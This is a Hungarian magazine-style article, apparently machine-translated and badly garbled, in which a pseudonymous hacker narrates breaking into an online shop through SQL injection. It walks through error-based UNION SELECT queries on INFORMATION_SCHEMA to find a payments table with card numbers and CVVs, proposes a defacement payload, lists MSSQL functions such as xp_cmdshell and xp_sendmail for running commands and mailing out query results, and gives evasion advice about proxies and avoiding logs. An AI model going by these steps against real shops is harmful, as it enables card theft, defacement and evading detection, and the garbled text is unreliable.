Hacking online áruház
Fjodor Mihajlovics
Sokan hallottak már a hacker az online áruházak. Mint valami rosszindulatú hacker áttörni áthatolhatatlan védelem a szerver, ellopni az összes hasznos információt, lett egy multi-milliomos, és eltűnt. Ez egy szép történet. Ahhoz, hogy megértsük, hogyan történik a valóságban, úgy döntöttünk, hogy kérje egy személy, hogy elmondja az ilyen dolgok. Nyilvánvaló okokból nyilvánosságra ő maga nem, és mutatkozott be Fjodor Mihajlovics. Itt van, amit mondott. Figyelem! Minden ezt követő adatok tájékoztató célt szolgálnak. Ne ismételje meg a gyakorlatban! Menjünk.
Cikkeket olvas kártolókeretek, akkor valószínűleg már többször azon, hogy a hackerek, hogy ezek a hűvös számú külföldi hitelkártyák. Valójában tudjuk, hogy: ettől veszélybe online boltok. Azonban valami azt súgja, hogy az olvasók többsége magukat rosszul képviseli a folyamat beszámítva az online boltban. Ahhoz, hogy legalább egy kicsit, hogy tisztázza a helyzetet, fogok beszélni a munkát a közelmúltban általam törés egy külföldi e-bolt.
Úgy tűnik, hogy az e-kereskedelem - a nyereséges vállalkozás, bármilyen információ szivárgás veszélyeztetheti itt súlyos veszteségeket, a veszteség a hírnév és az üzleti kapcsolatok. Még meglepőbb az a tény, hogy sok szervezet nem fordítanak kellő figyelmet a biztonsági saját rendszerek, amelyek, a végén, és fizessen.
Kezdetben volt a szó
Amikor sebezhetőségeket keres olyan szkriptek a támadó anélkül, hogy a forráskód ezek a programok általában igyekszik, hogy módosítsa a paramétereket a script, a szkript leállt végrehajtását sürgősségi és hozott legalább néhány információt. Ehhez szükség van néhány ötlet a selejt rendszerrel. Ebben a példában egy online áruház minden termék információ általában egy adatbázisban tárolják. Ennek megfelelően, amikor a felhasználó belép egy bizonyos részét a boltban, a forgatókönyvet választja a táblázat megfelelő termékeket, és megjeleníti ezeket az információkat a felhasználónak. E forgatókönyv, akkor a paraméter átadott termékek jelölésére bármely részén az érdeke, hogy a látogató. Gyakran előfordul, hogy egy ilyen változó megkülönböztető neve „sategory”, „CID” vagy „catid”. Mentem a talált oldalak kegyetlenül gúnyos szkriptek - helyette a lehetséges opciókat speciálisan kialakított értékeket. Egyes programok őszintén küldtek néhány felajánlott próbálja újra később :). Mindez nem áll jól nekem, az én script volt szükség, amely megszünteti a hibát, és adj az információt. Tehát, körülbelül egy óra múlva a keresés, rábukkantam egy ilyen áruház: miután feltettem egy idézet után „ProductCode” opciót, a forgatókönyvet a következőket mondta: „Lezáratlan idézőjel előtt karakterlánc»780 422-S«és a Stock> = 0 ”. /path/to/script.asp, 15. sor”. Ok, ez a mi ügyfél! A tapasztalt olvasó felkiált: „Igen, ez az sql-injection!” Ez igaz :). Csak akkor tudjuk kitalálni, amit a programozók gondoltak, amikor a rendszer tervezésekor. Bár én nem siet? Lehet, hogy semmi lényeges ez a hiba tényleg nem sikerül? Most ellenőrizze. Egy rossz pillanatban már - üzlet fut asp, és a nyelvet, még mindig nem volt egy nagyon szoros kapcsolat, bár mi van, sql injekció még Afrikában sql-injekciót.
Az a tény is. Lépni, azt kell teljes körű és pontos információkat a nevét és struktúráját az összes táblát az adatbázisban. Végtére is, amíg én nem tudok semmit! A legtöbb esetben, hogy láttam, én könnyen tudja beszerezni ezeket az információkat a hibaüzenetek, de nem ebben az időben. Már mászni helyben dolgozik a különböző szkriptek, de nem sikerült - kimenő adatok túl fukar. Már a kétségbeesés, eszembe jutott, hogy információkat a nevét, a táblákat és mezőket MSSQL alatt valamilyen rendszer felépítése, a nevét, amelyek nem emlékeztem. Gyorsan megtalálja a vonatkozó dokumentációt, megtudtam, hogy információt a tárolt táblázatok INFORMATION_SCHEMA.TABLES, Infa táblázatok mezők - a INFORMATION_SCHEMA.COLUMNS. Ok, most meg kellett valahogy ki a szükséges információkat. De itt van, hogyan kell csinálni? A gondolat, hogy a fejem egyszerre banális aktus útján unió javaslatok, hogy megpróbálja egyesíteni a termelés saját kérésére kell kezelni, mint egy programozó flow - ebben az esetben a program megmutatja nekem mindent, amit szükséges. Azonban, hogyan valósítható meg anélkül, hogy tudnánk semmit a szerkezet, és még a tábla neve selejt rendszerrel. (Ez egy ördögi kör, mint a régi vicc :. illesztőprogram a modem a cd, de cd-rom - az interneten remélve, hogy szerencsés, úgy döntöttem, hogy jár egy tompa választás - talán valami jön szóba a folyamat, vagy váratlanul felbukkan néhány kiegészítő információt Ok, hajtás: .. 1234 unió válasszuk table_name származó INFORMATION_SCHEMA.TABLES script esküszik :. »Minden lekérdezés az SQL-tartalmazó Unió üzemeltetőnek azonos számú kifejezések a cél listák« script panaszkodik hogy az Egyesült áramlás nem egyezik a mezők száma, amelyeknek semmi esetre nem jól, nem is olyan rossz -. most kibontása th számú kiválasztható második kérésmezők, előbb-utóbb megcsinálom, hogy megszüntesse ezt a hibát, és természetesen kap egy barátom, aki esküszik a mismatch típusú egyesült területeken. Legalább tudom száma kiválasztható első lekérdezés oszlopban. Van hozzá egy második kérelem egy mező, amíg 7 próbálkozások nem kapta meg a jó hírt: „Syntax error átalakítására nvarchar érték»AAAZZZZ«oszlopra adattípus int”. Egyszerűen szuper! A script üzenetet hozott, hogy nem lehet konvertálni „AAAZZZZ” karakter integer. És tudod, mi a „AAAZZZZ”? Ez a név az egyik asztal az adatbázisban!
Azért választottam ezt a rendszer felépítése a második kérés, ami természetesen nem lehet ragasztani az első, de még mindig kaptam, amit akartam - tájékoztatás a nevét az egyik asztal. Ok, most módosítjuk a kérést, azt kihalászta az adatbázisból információt táblákat a rendszer! Versenyeztem 1234 szakszervezete válasszuk table_name. (7-szer) a INFORMATION_SCHEMA.TABLES sorrendben tábla_neve ahol tábla neve> „AAAZZZZ”. Így kaptam az információt az adatbázis táblákat. Őszintén szólva, mert a kapott információk érdeklődés a helyszínen nőtt sokszor (különösen érdekelt a táblázatban kifizetések :)), de még inkább zavaros, mert a bázis mintegy száz asztalok, csak egyfajta billenő malosvyazannyh szerkezetek. Most, hogy valahogy összeköti a kapott információkat, szükség van a kivonat információt érdeklődési táblázatokat. Hadd emlékeztessem önöket, ezt az információt tárolja INFORMATION_SCHEMA.COLUMNS, ahol oszlop_neve - a mező nevét, column_type - típus és táblanév - a tábla neve. Választott a fent ismertetett információkat vétel, kaptam az információt a szerkezet minden szerkezetet a helyszínen - engem komolyan érdekel a lemez rfPayments, mintha mezőket az érdekes cím „CreditCardNumber”, „CVV”, „CardHolderAddress”, stb Most már nagyon közel volt a probléma a kivonás a szükséges információt az adatbázisból, akkor sürgősen rendezni kell, mert az egész szivattyú asztal hitel!
Te is nagyon könnyen zadefeysit helyén, mert tudtam, hogy a szerkezet az összes asztal és el tudja végezni a vizsgálatot. De a kérdés merült fel, a megvalósíthatósági ezen intézkedések. Először is, nyilvánosan felfedve tény hackelés, azt közvetlenül károsítják a hírnevét az üzlet, amit nem kell. Másodszor, ha az admin prosechet chip, a hitel hamarosan nem érvényes. Ezen kívül, azt el fogja veszíteni a nagy platformot az állandó gyűjtemény cc -, mert a bolti vásárlások készülnek naponta, illetve frissített táblázatát a hitel. Minden következett, hogy olvashatatlanná nem kell. De rájöttem, hogy hogyan lehet ezt megtenni. A honlap információkat tartalmaz termékeket, amelyek a legjobban értékesített. Ezek az adatok vannak kiválasztva rfProducts táblázatban - ennek megfelelően, ha megváltoztatjuk a árumegnevezésekre valami hasonló „LT img src = hack.ru / hacked.jpg szélesség = 500 magasság = 600 gt „akkor a honlapon lesz egy csomó termetes szép képeket kukoricadara és más” feltört ...”.
Természetesen kártolókeretek barátom, és nem én tettem. Sőt, én törölte a kapott információkat a hitelkártya és a rendszergazda írt egy levelet, amelyben beszélt részletesen a sérülékenységek és módszerek azok megoldására - válaszul, mint az várható volt, a csend. Egy bogár még mindig dolgozik. Csak találgathatunk, hogy mi történne, ha a fizetéssel kapcsolatos információkért esnek aljas kezébe elektronikus csalás.
Cool Jellemzők MSSQL
MSSQL szerver biztosítja a felhasználó egy csomó további funkciók, hogy lehet használni a hackerek:
1. sp_makewebtask „\\ share \ file.txt”, „MSSQL lekérdezés” - állítja a lekérdezés eredményének „MSSQL lekérdezés” egy szöveges fájl, amely lehet elhelyezni egy távoli szerveren, valamint a helyi gép fájlrendszert. A funkció számos további zsetonokat, de ezek kevéssé érdekes számunkra - használják a vizuális eredmények bemutatását.
2. xp_sendmail „[email protected]”, „select * from tábla” - küldi a lekérdezés eredménye a posta. A funkció is számos további paraméter, ezek mind nagyon részletesen MSDN, a dokumentumokat a témában megtalálja a mi CD-n.
3. xp_cmdshell 'dir c:' - végrehajtja a parancsot shell cmd egy távoli szerverre. Ezzel a funkcióval lehet, hogy egy csomó hasznos dolgot, minden attól függ, a fantáziádat. A legtöbb betörők vannak megfagyott, például készítsen egy csomó rendszer fájlokat - kivéve persze, sql felhasználó jogait elegendő erre a célra.
A kísérleteket irányító legyen óvatos! Tudom, hogy a mi súlyos alkalommal kaphat a szarvak csak elhelyezett egyik paraméter a szkript gonosz admin érték - tud értelmezhető behatolási kísérleteket, és az internetszolgáltatók általában ilyen esetekben ne habozzon le. Miért felesleges problémákat? Használjon egy anonim proxy. Naponta frissített proxy listát megtalálhatja itt: www.samair.ru/proxy/. Továbbá ne felejtsük el, hogy segítségével a biztonsági rést kihasználva a támadók ritkán hozzáférjen a log-fájlokat. Ezért próbálja alaposan ellenőrizze a kéréseket küld a kiszolgálónak, hogy ne végezze el ugyanazt a műveletet többször, egyre nagyobb a valószínűsége találni az intézkedések a rendszergazda. Legyen óvatos.
Az egyik legközelebbi szobák várják az anyag végrehajtásáról szóló sql-injection támadást a különböző adatbázis-kiszolgálók, többek között az Oracle és PostgreSQL.
Az egész története szereplő cikk tulajdonképpen egy része az új művészet a regény Dosztojevszkij és nem a földi valóság lényegtelen. Minden jog fenntartva.